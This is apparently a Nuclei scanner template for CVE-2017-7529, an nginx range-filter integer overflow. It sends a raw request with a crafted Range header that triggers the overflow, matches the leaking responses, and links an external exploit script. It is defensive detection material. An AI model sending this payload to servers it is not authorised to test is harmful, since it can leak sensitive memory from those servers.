33 lines
1.1 KiB
YAML
33 lines
1.1 KiB
YAML
id: cve-2017-7529
|
|
info:
|
|
author: "Harsh Bothra & @dwisiswant0"
|
|
name: "Nginx Remote Integer Overflow"
|
|
severity: medium
|
|
description: Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
|
|
|
|
# This template supports the detection part only.
|
|
# Do not test any website without permission
|
|
# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Range: bytes=-17208,-9223372036854758792
|
|
Connection: close
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 206
|
|
- type: word
|
|
words:
|
|
- "Server: nginx"
|
|
part: header
|
|
- type: word
|
|
words:
|
|
- "Content-Range"
|
|
part: body |